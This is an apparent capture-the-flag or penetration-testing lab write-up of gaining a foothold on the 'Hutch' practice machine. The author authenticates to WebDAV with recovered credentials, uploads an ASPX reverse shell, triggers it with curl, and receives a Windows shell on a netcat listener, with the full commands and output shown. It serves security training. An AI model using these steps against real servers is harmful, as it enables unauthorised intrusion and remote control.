InfoSec LAB

Hutch_Exploitation

Created: 2 min read

WebDAV

It has been identified that the target Web server has WebDAV enabled. While it requires authentication, I will attempt to authenticate using the credential of the fmcsorley user; CrabSharkJellyfish192

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ cadaver http://$IP/
Authentication required for 192.168.187.122 on server `192.168.187.122':
Username: fmcsorley
Password: CrabSharkJellyfish192
dav:/>

Successfully authenticated

dav:/> ls
Listing collection `/': succeeded.
Coll:   aspnet_client                          0  Nov  4  2020
        iisstart.htm                         703  Nov  4  2020
        iisstart.png                       99710  Nov  4  2020
        index.aspx                          1241  Nov  4  2020

While there is nothing notable at the web root directory, I could attempt to upload a ASPX shell to gain foothold

ASPX Shell Upload

dav:/> put shell.aspx 
Uploading shell.aspx to `/shell.aspx':
Progress: [=============================>] 100.0% of 3445 bytes succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll:   aspnet_client                          0  Nov  4  2020
        iisstart.htm                         703  Nov  4  2020
        iisstart.png                       99710  Nov  4  2020
        index.aspx                          1241  Nov  4  2020
        shell.aspx                          3445  May  1 16:57

Successfully uploaded the ASPX payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ curl -s http://$IP/shell.aspx

Invoking…

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ nnc 9999                                                                                                               
listening on [any] 9999 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.187.122] 51173
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\windows\system32\inetsrv> whoami
 whoami
iis apppool\defaultapppool
 
c:\windows\system32\inetsrv> hostname
 hostname
hutchdc
 
c:\windows\system32\inetsrv> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::9df9:8e58:4400:9b3a%3
   IPv4 Address. . . . . . . . . . . : 192.168.187.122
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.187.254

Initial Foothold established to the target system as the iis apppool\defaultapppool account via uploading an ASPX shell to the target WebDAV instance

Interactive Graph View

Backlinks